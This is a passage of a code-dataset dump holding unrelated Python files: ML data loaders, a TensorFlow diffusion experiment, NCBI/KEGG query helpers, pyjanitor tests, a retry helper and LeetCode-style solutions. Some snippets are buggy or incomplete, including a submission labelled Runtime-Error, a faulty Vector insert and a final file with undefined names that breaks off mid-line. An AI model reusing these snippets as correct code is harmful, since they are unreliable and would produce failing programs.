self.debug:\n self.label = self.label[0:100]\n self.data = self.data[0:100]\n self.sample_name = self.sample_name[0:100]\n\n self.N, self.C, self.T, self.V, self.M = self.data.shape\n\n def __len__(self):\n return len(self.label)\n\n def __getitem__(self, index):\n # get data\n data_numpy = np.array(self.data[index])\n label = self.label[index]\n\n # processing\n if self.random_choose:\n data_numpy = tools.random_choose(data_numpy, self.window_size)\n elif self.window_size > 0:\n data_numpy = tools.auto_pading(data_numpy, self.window_size)\n if self.random_move:\n data_numpy = tools.random_move(data_numpy)\n\n return data_numpy, label\n","sub_path":"PyTorch/contrib/cv/pose_estimation/ST-GCN/feeder/feeder.py","file_name":"feeder.py","file_ext":"py","file_size_in_byte":3147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"516870721","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n## Author: Sunil Patel\r\n## Copyright: Copyright 2018-2019, Packt Publishing Limited\r\n## Version: 0.0.1\r\n## Maintainer: sunil patel\r\n## Email: snlpatel01213@hotmail.com\r\n## Linkedin: https://www.linkedin.com/in/linus1/\r\n## Contributor : {if you debug, append your name here}\r\n## Contributor Email : {if you debug, append your email here}\r\n## Status: active\r\n\"\"\"\r\nimport numpy as np\r\nfrom tensorboardX import SummaryWriter\r\n\r\nif __name__ == '__main__':\r\n\r\n writer = SummaryWriter()\r\n for i in range(0, 10):\r\n dummy_img = np.random.random([3, 256, 256]) # output from network\r\n writer.add_image('Image', dummy_img, i)\r\n\r\n print(\r\n \"\"\"##################################\\n## Launch tensorboard as: ## \\n## tensorboard --logdir=runs/ ## \\n##################################\"\"\")\r\n writer.export_scalars_to_json(\"./all_scalars_2.json\")\r\n writer.close()\r\n","sub_path":"Chapter02/tfboardExperiments/images.py","file_name":"images.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"592267337","text":"\"\"\"\nVector ADT to simulate python list implementation\n\n - Vector(): Creates a new empty vector with an initial capacity of two elements.\n - length (): Returns the number of items contained in the vector.\n - contains ( item ): Determines if the given item is 
contained in the vector.\n - getitem ( ndx ): Returns the item stored in the ndx element of the list.\n The value of ndx must be within the valid range.\n - setitem ( ndx, item ): Sets the element at position ndx to contain the given\n item. The value of ndx must be within the valid range,\n which includes the first position past the last item.\n - append( item ): Adds the given item to the end of the list.\n - insert(ndx, item): Inserts the given item in the element at position ndx.\n The items in the elements at and following the given\n position are shifted down to make room for the new item.\n ndx must be within the valid range.\n - remove( ndx ): Removes and returns the item from the element from the given\n ndx position. The items in the elements at and following the\n given position are shifted up to close the gap created by the\n removed item. ndx must be within the valid range.\n - indexOf( item ): Returns the index of the vector element containing the given\n item. The item must be in the list.\n - extend( otherVector ): Extends this vector by appending the entire contents\n of the otherVector to this vector.\n - subVector( from, to ): Creates and returns a new vector that contains a\n subsequence of the items in the vector between and\n including those indicated by the given from and to\n positions. Both the from and to positions must be within\n the valid range.\n - iterator (): Creates and returns an iterator that can be used to traverse the\n elements of the vector.\n\"\"\"\nfrom array import Array\n\n\nclass Vector(object):\n def __init__(self, size=2):\n self.vector = Array(size)\n self.next_pos = 0\n\n def length(self):\n return len(self.vector)\n\n def contains(self, item):\n return item in self.vector\n\n def get_item(self, idx):\n return self.vector[idx]\n\n def set_item(self, idx, item):\n #print('set %s at idx %d' % (idx, item))\n self.vector[idx] = item\n # ensure insert at high index doesnt break this!\n if self.next_pos < idx:\n self.next_pos = idx + 1\n else:\n self.next_pos += 1\n\n def append(self, item):\n # find last empty position assuming contiguous entry\n # empty position has None\n # if current pos is greater than length, create another bigger array\n if self.next_pos >= self.length():\n temp = self.vector\n self.vector = Array(self.length() * 2) # double the array size\n self.next_pos = 0\n for idx, val in enumerate(temp):\n self.set_item(idx, val)\n self.set_item(self.next_pos, item)\n else:\n self.set_item(self.next_pos, item)\n\n def insert(self, idx, item):\n # only insert at valid position\n assert idx >= 0 and idx < self.length(), 'Array index out of range'\n print(self.next_pos, self.length())\n if (self.next_pos == self.length()):\n # create a new array\n temp = self.vector\n self.vector = Array(self.length() + 1)\n self.next_pos = 0\n for i, v in enumerate(temp):\n if i < idx:\n self.set_item(i, v)\n elif i >= idx:\n self.set_item(i, item)\n self.set_item(i+1, v)\n #elif self.next_pos < self.length():\n # print('==========')\n else:\n # use same array\n if not self.get_item(idx):\n self.set_item(idx, item)\n\n def __str__(self):\n return '[{!s}]'.format(', '.join(map(str, self.vector)))\n\n\nprint('Creating a new vector ...')\nv = Vector()\nprint(v)\nprint('contains 100: {}'.format(v.contains(100)))\nprint('set idx, item = 0, 100')\nv.set_item(0, 100)\nprint('contains 100: {}'.format(v.contains(100)))\nprint(v)\nprint('append an item=4')\nv.append(4)\nprint(v)\nprint('append an 
item=39')\nv.append(39)\nprint(v)\n\nprint('-------------------------------')\nw = Vector()\nprint(w)\nw.insert(0, 50)\nw.insert(1, 61)\nprint(w)\nw.insert(1, 35)\nprint(w)\nw.append(100)\nprint(w)\n\nprint(w)\n","sub_path":"ds_and_algos_using_python/chap_2_arrays/vector.py","file_name":"vector.py","file_ext":"py","file_size_in_byte":4728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"598635071","text":"class Solution(object):\n def summaryRanges(self, nums):\n if not nums:\n return []\n end = nums[0]\n start = end\n result = []\n for idx in range(len(nums)):\n if idx + 1 < len(nums) and nums[idx] + 1 == nums[idx + 1]:\n continue\n end = nums[idx]\n result.append(str(start) if start == end else str(start) + '->' + str(end))\n start = nums[idx + 1]\n return result\n","sub_path":"228/228.summary-ranges.171168319.Runtime-Error.leetcode.py","file_name":"228.summary-ranges.171168319.Runtime-Error.leetcode.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"195025373","text":"import pandas as pd\nimport pytest\nfrom pandas.testing import assert_frame_equal\n\n\n@pytest.mark.functions\n@pytest.mark.parametrize(\n \"invert,expected\",\n [\n (False, [\"a\", \"Bell__Chart\", \"cities\"]),\n (True, [\"decorated-elephant\", \"animals@#$%^\"]),\n ],\n)\ndef test_select_column_names(dataframe, invert, expected):\n \"Base DataFrame\"\n columns = [\"a\", \"Bell__Chart\", \"cities\"]\n df = dataframe.select_columns(columns, invert=invert)\n\n assert_frame_equal(df, dataframe[expected])\n\n\n@pytest.mark.functions\n@pytest.mark.parametrize(\n \"invert,expected\",\n [\n (False, [\"Bell__Chart\", \"a\", \"animals@#$%^\"]),\n (True, [\"decorated-elephant\", \"cities\"]),\n ],\n)\ndef test_select_column_names_glob_inputs(dataframe, invert, expected):\n \"Base DataFrame\"\n columns = [\"Bell__Chart\", \"a*\"]\n df = dataframe.select_columns(columns, invert=invert)\n\n assert_frame_equal(df, dataframe[expected])\n\n\n@pytest.mark.functions\n@pytest.mark.parametrize(\n \"columns\",\n [\n [\"a\", \"Bell__Chart\", \"foo\"],\n [\"a\", \"Bell__Chart\", \"foo\", \"bar\"],\n [\"a*\", \"Bell__Chart\", \"foo\"],\n [\"a*\", \"Bell__Chart\", \"foo\", \"bar\"],\n ],\n)\ndef test_select_column_names_missing_columns(dataframe, columns):\n \"\"\"Check that passing non-existent column names or search strings raises KeyError\"\"\" # noqa: E501\n with pytest.raises(KeyError):\n dataframe.select_columns(columns)\n\n\n@pytest.mark.functions\n@pytest.mark.parametrize(\n \"columns\",\n [\n pytest.param(\n \"a\",\n marks=pytest.mark.xfail(\n reason=\"`select_columns` now accepts strings\"\n ),\n ),\n pytest.param(\n (\"a\", \"Bell__Chart\"),\n marks=pytest.mark.xfail(\n reason=\"`select_columns` converts list-like into lists\"\n ),\n ),\n pytest.param(\n {\"a\", \"Bell__Chart\"},\n marks=pytest.mark.xfail(\n reason=\"`select_columns` converts list-like into lists\"\n ),\n ),\n ],\n)\ndef test_select_column_names_input(dataframe, columns):\n \"\"\"Check that passing an iterable that is not a list raises TypeError.\"\"\"\n with pytest.raises(TypeError):\n dataframe.select_columns(columns)\n\n\n@pytest.mark.functions\n@pytest.mark.parametrize(\n \"invert,expected\",\n [\n (False, [\"Bell__Chart\", \"a\", \"decorated-elephant\"]),\n (True, [\"animals@#$%^\", \"cities\"]),\n ],\n)\ndef test_select_unique_columns(dataframe, invert, expected):\n \"\"\"Test that only unique columns are 
returned.\"\"\"\n columns = [\"Bell__*\", slice(\"a\", \"decorated-elephant\")]\n df = dataframe.select_columns(columns, invert=invert)\n\n assert_frame_equal(df, dataframe[expected])\n\n\n@pytest.mark.functions\n@pytest.mark.parametrize(\n \"invert,expected\",\n [\n (False, [\"Bell__Chart\", \"decorated-elephant\"]),\n (True, [\"a\", \"animals@#$%^\", \"cities\"]),\n ],\n)\ndef test_select_callable_columns(dataframe, invert, expected):\n \"\"\"Test that columns are returned when a callable is passed.\"\"\"\n\n def columns(x):\n return \"-\" in x.name or \"_\" in x.name\n\n df = dataframe.select_columns(columns, invert=invert)\n\n assert_frame_equal(df, dataframe[expected])\n\n\n@pytest.mark.xfail(reason=\"Allow tuples which are acceptable in MultiIndex.\")\ndef test_MultiIndex():\n \"\"\"\n Raise ValueError if columns is a MultiIndex.\n \"\"\"\n df = pd.DataFrame(\n {\n \"A\": {0: \"a\", 1: \"b\", 2: \"c\"},\n \"B\": {0: 1, 1: 3, 2: 5},\n \"C\": {0: 2, 1: 4, 2: 6},\n }\n )\n\n df.columns = [list(\"ABC\"), list(\"DEF\")]\n\n with pytest.raises(ValueError):\n df.select_columns(\"A\")\n","sub_path":"tests/functions/test_select_columns.py","file_name":"test_select_columns.py","file_ext":"py","file_size_in_byte":3686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"354599444","text":"from PIL import Image\nfrom sklearn.model_selection import train_test_split\nimport numpy as np\nimport os\n\n\ndef load_data(percent_of_damage=0.2):\n root_dir = '/src/workspace/dataset/'\n dataset = 'bridge_masks_patches/'\n patch_dir = '100/'\n deck_dirs = ['deck_a/', 'deck_c/', 'deck_d/', 'deck_e/']\n image_list, label_list = [], []\n for deck_dir in deck_dirs:\n mask_fpath = os.path.join(root_dir, dataset, patch_dir, deck_dir)\n image_dirs = os.listdir(mask_fpath)\n for image_dir in image_dirs:\n image_names = sorted(\n os.listdir(os.path.join(mask_fpath, image_dir))\n )\n for image_name in image_names:\n img_fpath = os.path.join(\n root_dir,\n 'images_patches',\n patch_dir,\n deck_dir\n )\n img_path = os.path.join(img_fpath, image_dir, image_name)\n mask_path = os.path.join(mask_fpath, image_dir, image_name)\n img = np.asarray(Image.open(img_path))\n mask = np.asarray(Image.open(mask_path))\n image_list.append(img)\n damage_pixels = (mask / 255).sum()\n if damage_pixels > 100 * 100 * percent_of_damage:\n label_list.append(1)\n else:\n label_list.append(0)\n x = np.array(image_list)\n y = np.array(label_list)[:, np.newaxis]\n x_train, x_test, y_train, y_test = train_test_split(\n x,\n y,\n test_size=0.33,\n random_state=42\n )\n\n return (x_train, y_train), (x_test, y_test)\n\n\nif __name__ == '__main__':\n (x_train, y_train), (x_test, y_test) = load_data()\n","sub_path":"dataset/bridge.py","file_name":"bridge.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"326589333","text":"#!/usr/bin/env python\nimport requests\nimport re\n\ndef functionNcbiIDName(organism,query) :\n print(\"Querying NCBI ...\")\n Dict={}\n\n r = requests.get(\n \"https://eutils.ncbi.nlm.nih.gov/entrez/eutils/esearch.fcgi?db=gene&term={}[Gene Name]+AND+{}[Organism]&format=json\".format(\n query, organism))\n\n if r.ok:\n decoded = r.json()\n list_id = decoded[\"esearchresult\"][\"idlist\"]\n for id in list_id :\n r2 = requests.get(\"https://eutils.ncbi.nlm.nih.gov/entrez/eutils/esummary.fcgi?db=gene&id={}&retmode=json\".format(id))\n if r2.ok :\n decoded2 = r2.json()\n 
officialFullName = repr(decoded2[\"result\"][\"{}\".format(id)][\"description\"])\n                officialFullName_clean = re.sub(\"'\", \"\", officialFullName)\n                Dict[id]=officialFullName_clean\n    print(\"Querying End\")\n    return(list_id,Dict)\n\ndef functionKeggID(list_id):\n    print(\"Querying Kegg ...\")\n    r=requests.get(\"http://rest.kegg.jp/conv/genes/ncbi-geneid:{}\".format(list_id[0]))\n    if r.ok:\n        result = r.text.rstrip() #rstrip: removes end-of-line characters (here, trailing whitespace)\n        result_split = result.split(\"\\t\")\n        keggID = str(result_split[1::2]) #[startAt:endBefore:skip]\n        keggID_clean = re.sub(\"[\\[\\'][\\'\\]]\", \"\", keggID)\n        prefixKegg = re.sub(\"\\:.+\",\"\",keggID_clean)\n        return (keggID_clean,prefixKegg)\n\ndef functionKeggPathway(keggID,prefixKegg):\n    r= requests.get(\"https://www.genome.jp/dbget-bin/get_linkdb?-t+pathway+{}\".format(keggID))\n    Dict={}\n    if r.ok:\n        listIDName = re.findall(\"{}\\d.+\".format(prefixKegg), r.text)\n        for element in listIDName:\n            #retrieve the metabolic pathways\n            #parsing html\n            line = re.sub(\"\\+.+
\", \"\", element)\n line_clean = re.sub(\"\\s{2,}\", \"\\t\", line)\n list_temporary = re.split(\"\\t\",line_clean)\n keggPathway=list_temporary[1]\n IDPathway=list_temporary[0]\n Dict[IDPathway]=keggPathway\n print(\"Querying End\")\n return(Dict)\n\n","sub_path":"Morgane/ncbiFunction.py","file_name":"ncbiFunction.py","file_ext":"py","file_size_in_byte":2079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"591542997","text":"from typing import Optional, List\n\nimport logging\n\nfrom tenacity import retry, wait_exponential, retry_if_exception_type, stop_after_attempt, before_log, after_log\nimport requests\n\nlogger = logging.getLogger(__file__)\n\n\ndef request_with_retry(\n attempts: int = 3, status_codes_to_retry: Optional[List[int]] = None, **kwargs\n) -> requests.Response:\n \"\"\"\n request_with_retry is a simple wrapper function that executes an HTTP request\n with a configurable exponential backoff retry on failures.\n\n All kwargs will be passed to ``requests.request``, so it accepts the same arguments.\n\n Example Usage:\n --------------\n\n # Sending an HTTP request with default retry configs\n res = request_with_retry(method=\"GET\", url=\"https://example.com\")\n\n # Sending an HTTP request with custom number of attempts\n res = request_with_retry(method=\"GET\", url=\"https://example.com\", attempts=10)\n\n # Sending an HTTP request with custom HTTP codes to retry\n res = request_with_retry(method=\"GET\", url=\"https://example.com\", status_codes_to_retry=[408, 503])\n\n # Sending an HTTP request with custom timeout in seconds\n res = request_with_retry(method=\"GET\", url=\"https://example.com\", timeout=5)\n\n # Sending an HTTP request with custom authorization handling\n class CustomAuth(requests.auth.AuthBase):\n def __call__(self, r):\n r.headers[\"authorization\"] = \"Basic \"\n return r\n\n res = request_with_retry(method=\"GET\", url=\"https://example.com\", auth=CustomAuth())\n\n # All of the above combined\n res = request_with_retry(\n method=\"GET\",\n url=\"https://example.com\",\n auth=CustomAuth(),\n attempts=10,\n status_codes_to_retry=[408, 503],\n timeout=5\n )\n\n # Sending a POST request\n res = request_with_retry(method=\"POST\", url=\"https://example.com\", data={\"key\": \"value\"}, attempts=10)\n\n # Retry all 5xx status codes\n res = request_with_retry(method=\"GET\", url=\"https://example.com\", status_codes_to_retry=list(range(500, 600)))\n\n :param attempts: Maximum number of attempts to retry the request, defaults to 3\n :param status_codes_to_retry: List of HTTP status codes that will trigger a retry, defaults to [408, 418, 429, 503]:\n - `408: Request Timeout`\n - `418`\n - `429: Too Many Requests`\n - `503: Service Unavailable`\n :param **kwargs: Optional arguments that ``request`` takes.\n :return: :class:`Response ` object\n \"\"\"\n\n if status_codes_to_retry is None:\n status_codes_to_retry = [408, 418, 429, 503]\n\n @retry(\n reraise=True,\n wait=wait_exponential(),\n retry=retry_if_exception_type((requests.HTTPError, TimeoutError)),\n stop=stop_after_attempt(attempts),\n before=before_log(logger, logging.DEBUG),\n after=after_log(logger, logging.DEBUG),\n )\n def run():\n timeout = kwargs.pop(\"timeout\", 10)\n res = requests.request(**kwargs, timeout=timeout)\n\n if res.status_code in status_codes_to_retry:\n # We raise only for the status codes that must trigger a retry\n res.raise_for_status()\n\n return res\n\n res = run()\n # We raise here too in case the request failed with a 
status code that\n # won't trigger a retry, this way the call will still cause an explicit exception\n res.raise_for_status()\n return res\n","sub_path":"haystack/preview/utils/requests_utils.py","file_name":"requests_utils.py","file_ext":"py","file_size_in_byte":3406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"253573250","text":"__author__ = 'lusisi'\n\nclass Solution(object):\n '''\n move 0 to the end of the list, the rest elements should keep the original order\n '''\n def moveZeroes(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: void Do not return anything, modify nums in-place instead.\n \"\"\"\n cur = 0\n for i in xrange(len(nums)):\n if nums[i]:\n nums[cur] = nums[i]\n cur+=1\n for i in xrange(cur,len(nums)):\n nums[i] = 0\n\nclass Solution2(object):\n def moveZeroes(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: void Do not return anything, modify nums in-place instead.\n \"\"\"\n cur = 0\n for i in xrange(len(nums)):\n if nums[i]:\n nums[i],nums[cur] = nums[cur],nums[i] ##########\n cur+=1","sub_path":"leetcode/MoveZeros.py","file_name":"MoveZeros.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"553454706","text":"import tensorflow as tf\nfrom tensorflow import keras\nimport tensorflow_probability as tfp\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport time\nimport os\n\ntfb = tfp.bijectors\ntfd = tfp.distributions\n\n# tf.config.run_functions_eagerly(True)\n\ntf.config.optimizer.set_jit(True)\nos.environ[\n \"TF_XLA_FLAGS\"\n] = \"--tf_xla_cpu_global_jit /mnt/c/Users/Edvin/Desktop/sde-image/sde-image-generation/diffusion-vae.py\"\n\n\nclass ConditionedDiffusionBijector(tfb.Bijector):\n def __init__(\n self,\n mu,\n sigma,\n ti,\n dt,\n paths,\n density,\n validate_args=False,\n name=\"cond_diffusion\",\n ):\n super(ConditionedDiffusionBijector, self).__init__(\n validate_args=validate_args,\n forward_min_event_ndims=1,\n inverse_min_event_ndims=1,\n name=name,\n is_constant_jacobian=True,\n )\n\n self.event_ndim = 1\n self.mu = mu\n self.sigma = sigma\n self.paths = paths\n self.time = ti\n self.ti = tf.repeat(ti, self.paths, axis=0)\n self.dt = dt\n self.density = density\n\n self.prev_x = None\n self.next_y = None\n self.point = None\n\n def _forward(self, x):\n self.prev_x = x\n next_x = (\n x\n + (self.mu(x, self.ti) * self.dt)\n + (\n self.sigma(x, self.ti)\n * tf.math.sqrt(self.dt)\n * np.random.randn(self.paths)\n )\n )\n return next_x\n\n def _inverse(self, y):\n next_y = (\n y\n + (\n (\n self.mu(y, self.ti)\n - (self.sigma(y, self.ti) * self._forward_log_det_jacobian(y))\n )\n * self.dt\n )\n + (\n self.sigma(y, self.ti)\n * tf.math.sqrt(self.dt)\n * np.random.randn(self.paths)\n )\n )\n self.next_y = next_y\n return next_y\n\n # def _inverse_log_det_jacobian(self, y, t):\n # return -self._forward_log_det_jacobian(self._inverse(y, t))\n\n def _forward_log_det_jacobian(self, x):\n self.point = tf.transpose(tf.concat([[x], [self.ti]], axis=0))\n\n with tf.GradientTape(persistent=True) as tape:\n tape.watch(self.point)\n dlogf_dxt = tape.gradient(\n tf.math.log(self.density(self.point, training=True)), self.point\n )\n return dlogf_dxt[:, 0]\n\n\n# model\ndensity_inputs = keras.Input(shape=(2,))\nxl = keras.layers.Dense(64, activation=\"relu\")(density_inputs)\nxl = keras.layers.Dense(32, activation=\"sigmoid\")(xl)\nxl = keras.layers.Dense(64, 
activation=\"sigmoid\")(xl)\ndensity_outputs = keras.layers.Dense(1, activation=\"linear\")(xl)\nmodel = keras.Model(density_inputs, density_outputs, name=\"density\")\nmodel.compile(optimizer=\"Adam\", loss=\"mse\")\n\noptimizer = tf.keras.optimizers.Adam(learning_rate=0.0001)\nloss_tracker = keras.metrics.Mean(name=\"loss\")\n\nmix = 0.3\nbimix_gauss = tfd.Mixture(\n cat=tfd.Categorical(probs=[mix, 1.0 - mix]),\n components=[\n tfd.Normal(loc=-1.0, scale=0.5),\n tfd.Normal(loc=+1.0, scale=0.5),\n ],\n)\n\nnormal = tfp.distributions.Normal(\n 0.0, 5.0, validate_args=False, allow_nan_stats=True, name=\"Normal\"\n)\n\n\n@tf.function\ndef reconstruction(prev_x, next_y):\n mae_loss = tf.reduce_mean(tf.math.abs(prev_x - next_y))\n return mae_loss\n\n\n@tf.function\ndef kolmogorov(point, mu, sigma):\n x = point[:, 0]\n t = point[:, 1]\n with tf.GradientTape(persistent=True) as tape2:\n tape2.watch(point)\n\n with tf.GradientTape(persistent=True) as tape1:\n tape1.watch(point)\n f = model(point, training=True)\n df_dxt = tape1.gradient(f, point)\n d2f_dxt2 = tape1.gradient(df_dxt, point)\n\n # forward kolmogorov\n # df_dt = - mu * df_dx + 0.5 * sig^2 * d2f_dx2\n klm_loss = tf.reduce_sum(\n tf.math.abs(\n df_dxt[:, 1]\n + mu(x, t) * df_dxt[:, 0]\n - 0.5 * tf.math.square(sigma(x, t)) * d2f_dxt2[:, 0]\n )\n )\n return klm_loss\n\n\n# @tf.function\ndef train_step(bijector, paths, mu, sigma):\n x0 = bimix_gauss.sample(paths)\n xt = bijector._forward(x0)\n\n with tf.GradientTape(persistent=True) as tape:\n x0_bar = bijector._inverse(xt.numpy()) # <- breaks if you pass tensors\n\n prev_x = bijector.bijectors[0].prev_x\n next_y = bijector.bijectors[0].next_y\n time = bijector.bijectors[0].time\n point = bijector.bijectors[0].point\n\n mae_loss = reconstruction(prev_x, next_y)\n klm_loss = kolmogorov(point, mu, sigma)\n loss = mae_loss + klm_loss\n\n if (len(bijector.bijectors) % 100 == 0):\n print(\"time: {:.2f} - loss: {:.2f}\".format(time, loss.numpy()))\n\n grads = tape.gradient(loss, model.trainable_weights)\n optimizer.apply_gradients(zip(grads, model.trainable_weights))\n return loss\n\n\ndef main():\n\n mu = lambda x, t: 0.0\n sigma = lambda x, t: 1.5\n paths = 1000\n tmin = 0.0\n tmax = 5.0\n dt = 0.01\n steps = int((tmax - tmin) / dt)\n t = tf.linspace(tmin, tmax, int(steps + 1))\n\n epochs = 100\n for epoch in range(epochs):\n start_time = time.time()\n\n bijectors = []\n\n for ti in t[1:]:\n bijectors.append(\n ConditionedDiffusionBijector(\n mu,\n sigma,\n ti,\n dt,\n paths,\n model,\n )\n )\n\n bijector = tfb.Chain(list(reversed(bijectors)))\n loss_value = train_step(bijector, paths, mu, sigma)\n\n loss_tracker.update_state(loss_value)\n train_acc = loss_tracker.result()\n elapsed = time.time() - start_time\n loss_tracker.reset_states()\n\n print(\n \"\\nEpoch: {} - Elapsed: {:.2f} seconds - Loss: {:.2f}\\n\".format(epoch, elapsed, train_acc)\n )\n\n x0 = bimix_gauss.sample(paths)\n xt = bijector._forward(x0)\n x0_bar = bijector._inverse(xt.numpy())\n plt.hist(x0.numpy(), 100, alpha=0.5, label=\"x0\")\n plt.hist(xt.numpy(), 100, alpha=0.5, label=\"xt\")\n plt.hist(x0_bar.numpy(), 100, alpha=0.5, label=\"x0_bar\")\n plt.legend(loc=\"upper right\")\n plt.show()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"diffusion-vae.py","file_name":"diffusion-vae.py","file_ext":"py","file_size_in_byte":6460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"45344805","text":"\"\"\"\nGiven a binary tree. 
Check whether it is a BST or not.\n\nExample 1:\n\nInput:\n 2\n / \\\n1 3\nOutput: 1\n\nProblem link :- \nhttps://practice.geeksforgeeks.org/problems/check-for-bst/1/?company[]=Amazon&problemStatus=solved&problemType=functional&page=1&sortBy=submissions&query=company[]AmazonproblemStatussolvedproblemTypefunctionalpage1sortBysubmissions\n\n\"\"\"\n\n\nINT_MAX = 4294967296\nINT_MIN = -4294967296\n\nfrom collections import deque\n# Tree Node\nclass Node:\n def __init__(self, val):\n self.right = None\n self.data = val\n self.left = None\n\n# Function to Build Tree \ndef buildTree(s):\n #Corner Case\n if(len(s)==0 or s[0]==\"N\"): \n return None\n \n # Creating list of strings from input \n # string after spliting by space\n ip=list(map(str,s.split()))\n \n # Create the root of the tree\n root=Node(int(ip[0])) \n size=0\n q=deque()\n \n # Push the root to the queue\n q.append(root) \n size=size+1 \n \n # Starting from the second element\n i=1 \n while(size>0 and i=len(ip)):\n break\n currVal=ip[i]\n \n # If the right child is not null\n if(currVal!=\"N\"):\n \n # Create the right child for the current node\n currNode.right=Node(int(currVal))\n \n # Push it to the queue\n q.append(currNode.right)\n size=size+1\n i=i+1\n return root\n\n\ndef isBST(node):\n return checkBST(node,INT_MIN,INT_MAX)\n\ndef checkBST(node,mini,maxi):\n if node==None:\n return 1\n else:\n if node.data<=mini or node.data>=maxi:\n return 0\n else:\n return (checkBST(node.left,mini,node.data) and checkBST(node.right,node.data,maxi))\n \n \nif __name__==\"__main__\":\n t=int(input())\n for _ in range(0,t):\n s=input()\n root=buildTree(s)\n if isBST(root):\n print(1) \n else:\n print(0)\n","sub_path":"GeeksforGeeks/check_for_bst.py","file_name":"check_for_bst.py","file_ext":"py","file_size_in_byte":2614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"242934119","text":"import os, sys\nimport pandas as pd, numpy as np\n\n\n#############################################################################################\n##################### CREATE SYNTHETIC TIMESERIES############################################\ndef create_timeseries1d(start_date = '1/1/2000' ,end_date = None ,periods = 1000, freq = 'D' ,weight = 1 , fun=None ):\n \n date_rng = pd.date_range(start=start_date, end=end_date, freq='D',periods=periods)\n df = pd.DataFrame(date_rng, columns=['date'])\n data =[]\n for index in range(0,len(df)):\n data.append(fun(index)) \n df['data'] = data\n df['datetime'] = pd.to_datetime(df['date'])\n df = df.set_index('datetime')\n df.drop(['date'], axis=1, inplace=True)\n return df\n\n\ndef create_timeseries_2d(start_date = '1/1/2000' ,end_date = None ,periods = 660, freq = 'D' ,weight = 1 , fun=None ):\n pass\n \n \n \ndef create_timeseries_kd(start_date = '1/1/2000' ,end_date = None ,periods = 660, freq = 'D' ,weight = 1 , params=None ):\n date_rng = pd.date_range(start=start_date, end=end_date, freq='D',periods=periods)\n df = pd.DataFrame(date_rng, columns=['date'])\n data =[]\n Ncols = len(params)\n for key in params:\n data = [] \n fun = params[key]\n for index in range(0,len(df)):\n data.append(fun(index)) \n df[key] = data\n df['datetime'] = pd.to_datetime(df['date'])\n df = df.set_index('datetime')\n df.drop(['date'], axis=1, inplace=True)\n return df\n ### k dumsnio\n\n \n \n \n\ndef model_eval(clf0, df, colX, coly=\"y\", test_size=0.5, istrain=1, use_eval=0 ) :\n clf = copy.deepcopy(clf0) \n yy = df[coly].values\n X = df[colX].values \n X = X.reshape(-1,1) if 
len(colX) == 1 else X\n print(\"X\", X.shape )\n\n if istrain : \n X_train, X_test, y_train, y_test = train_test_split( X, yy, test_size=test_size, \n random_state=42)\n del X, yy\n gc.collect()\n if use_eval : \n try :\n clf.fit(X_train, y_train , eval_set= (X_test0, y_test0) )\n except :\n print(\"Using local\", flush=True) \n clf.fit(X_train, y_train , eval_set= (X_test, y_test) ) \n \n else :\n clf.fit(X_train, y_train )\n\n\n ytest_proba = clf.predict_proba(X_test)[:, 1]\n ytest_pred = clf.predict(X_test)\n sk_showmetrics(y_test, ytest_pred, ytest_proba)\n return clf\n\n else :\n y_proba = clf.predict_proba(X)[:, 1]\n y_pred = clf.predict(X)\n sk_showmetrics(yy, y_pred, y_proba)\n\n\n\n\n\ndef model_fit(df2, cols_train, col_target = \"y\", save_suffix=\"area_gms_201909\",\n modelname= \"RandomForestClassifier\", dosave=1 , coldate=\"dateint\", test_size=0.9,\n coldate_limit = 201801, dfeval=None,\n dirmodel =\"\",\n **kw) :\n #cols_train = [ 'ALL_ROOM', 'travel_gms_total_1yr', 'travel_gms_total_6mth',\n # 'travel_gms_total_1mth', 'travel_cnt_total_1yr',\n # 'travel_cnt_total_6mth', 'gms_6mth_diff', 'gms_1yr_diff', ]\n # col_target = \"y\"\n print( df2[ cols_train ].head(3) )\n print( \"coltarget\", sum(df2[ col_target] ) )\n imax =len(df2)\n\n\n ########### Train ############################################################\n clf, use_eval = model_get(name= modelname, **kw)\n #cols_train = RandomForestClassifier(max_depth= kw[\"max_depth\"], n_estimators= kw[\"n_estimators\"],\n # class_weight=\"balanced\" ) # random_state=0,\n\n clf = model_eval( clf, df2,\n colX = cols_train, coly= col_target, test_size=test_size, istrain = 1,\n use_eval= use_eval )\n\n clf_features = feature_impt_rf(clf , cols_train)\n \n\n ########### Prediction Check ##############################################\n if dfeval is not None :\n print(\"Using Eval\") \n else : \n dfeval = df2\n print(\"using Full\")\n \n dfeval[ col_target + \"pred\" ] = clf.predict( dfeval[cols_train].values )\n dfeval[ col_target + \"pred_proba\"] = clf.predict_proba( dfeval[cols_train].values )[:,1]\n\n dfstat = metric_accuracy_check(dfeval, col_target= col_target, ypred = col_target + \"pred\",\n ypred_proba = col_target + \"pred_proba\", coldate = coldate )\n print(dfstat)\n \n if dosave :\n ########### Export Model ##################################################\n dirmodel2 = dirmodel + \"/\" +save_suffix +\"/\"\n os.makedirs( dirmodel2, exist_ok=True )\n save_model(clf, cols_train, df2, dirmodel2 , f\"clf\" )\n # df2.to_csv( dirmodel + f\"/travel_{save_suffix}_.csv\")\n dfstat.to_csv( dirmodel2 + f\"/clf_stats.csv\")\n save_session(folder= dirsession + 